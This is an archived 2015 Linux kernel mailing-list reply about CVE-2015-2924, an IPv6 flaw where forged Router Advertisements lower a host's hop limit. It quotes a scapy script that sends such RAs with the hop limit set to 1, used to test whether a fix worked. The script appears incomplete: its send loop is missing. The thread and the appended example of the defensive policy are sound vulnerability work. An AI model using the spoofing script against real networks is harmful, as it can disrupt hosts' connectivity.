Re: [GIT] Networking
From: D.S. Ljungmark
Date: Wed Apr 29 2015 - 11:17:38 EST
On 29/04/15 16:51, Denys Vlasenko wrote:
> On Wed, Apr 1, 2015 at 9:48 PM, David Miller <davem@xxxxxxxxxxxxx> wrote:
>> D.S. Ljungmark (1):
>> ipv6: Don't reduce hop limit for an interface
> I was testing this change and apparently it doesn't close the hole.
> The python script I use to send RAs:
> #!/usr/bin/env python
> import sys
> import time
> import scapy.all
> from scapy.layers.inet6 import *
> ip = IPv6()
> # ip.dst = 'ff02::1'
> ip.dst = sys.argv
> icmp = ICMPv6ND_RA()
> icmp.chlim = 1
> for x in range(10):
> # ./ipv6-hop-limit.py fe80::21e:37ff:fed0:5006
> Sent 1 packets.
> ...<10 times>...
> Sent 1 packets.
> After I do this, on the targeted machine I check hop_limits:
> # for f in /proc/sys/net/ipv6/conf/*/hop_limit; do echo -n $f:; cat $f; done
> /proc/sys/net/ipv6/conf/enp0s25/hop_limit:1 <=== THIS
> As you see, the interface which received RAs still lowered
> its hop_limit to 1. I take it means that the bug is still present
> (right? I'm not a network guy...).
It might not be present in the _kernel_. Do you run NetworkManager on
your system? If so, see below.
> I triple-checked that I do run the kernel with the fix.
> Further investigation shows that the code touched by the fix
> is not even reached, hop_limit is changed elsewhere.
> I'm willing to test additional patches.
NetworkManager had its own re-implementation of the bug. It got fixed
with NetworkManager commit:
Author: Thomas Haller <thaller@xxxxxxxxxx>
Date: Wed Apr 8 15:54:30 2015 +0200
platform: don't accept lowering IPv6 hop-limit from RA (CVE-2015-2924)
Before that commit, NetworkManager would take the RA packet, extract
the hop limit, and write it to the sysctl itself.
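
The following is an added example, not part of the original message and not the kernel's or NetworkManager's code. It sketches the policy named in the two commit titles above (an RA may not lower the hop limit) next to the pre-fix behaviour the message describes. The function names, the constructed RA bytes, and the handling of 0 as "unspecified" (per RFC 4861) are assumptions of this example.

```python
import struct

ND_ROUTER_ADVERT = 134   # ICMPv6 type of a Router Advertisement (RFC 4861)
RA_FIXED_LEN = 16        # fixed RA header length, before any options
RA_FORMAT = "!BBHBBHII"  # type, code, cksum, cur hop limit, flags, lifetime, reachable, retrans


def ra_cur_hop_limit(icmp6: bytes) -> int:
    """Return the Cur Hop Limit field of a raw ICMPv6 Router Advertisement."""
    if len(icmp6) < RA_FIXED_LEN:
        raise ValueError("truncated Router Advertisement")
    msg_type, code, _ck, hop_limit, _fl, _life, _reach, _retrans = struct.unpack(
        RA_FORMAT, icmp6[:RA_FIXED_LEN])
    if msg_type != ND_ROUTER_ADVERT or code != 0:
        raise ValueError("not a Router Advertisement")
    return hop_limit


def naive_hop_limit(current: int, advertised: int) -> int:
    """Pre-fix behaviour described in the thread: the advertised value is written."""
    return advertised if advertised != 0 else current  # assumption: 0 = unspecified


def hardened_hop_limit(current: int, advertised: int) -> int:
    """Post-fix policy: an RA may raise the hop limit but never lower it."""
    if advertised == 0:  # assumption: 0 = unspecified by this router
        return current
    return advertised if advertised > current else current


def build_ra(hop_limit: int) -> bytes:
    """Constructed sample RA for this example (checksum left at 0, not validated)."""
    return struct.pack(RA_FORMAT, ND_ROUTER_ADVERT, 0, 0, hop_limit, 0, 1800, 0, 0)


if __name__ == "__main__":
    current = 64  # constructed starting value for the interface
    for adv in (1, 0, 255):
        seen = ra_cur_hop_limit(build_ra(adv))
        print(f"RA chlim={seen}: naive -> {naive_hop_limit(current, seen)}, "
              f"hardened -> {hardened_hop_limit(current, seen)}")
```
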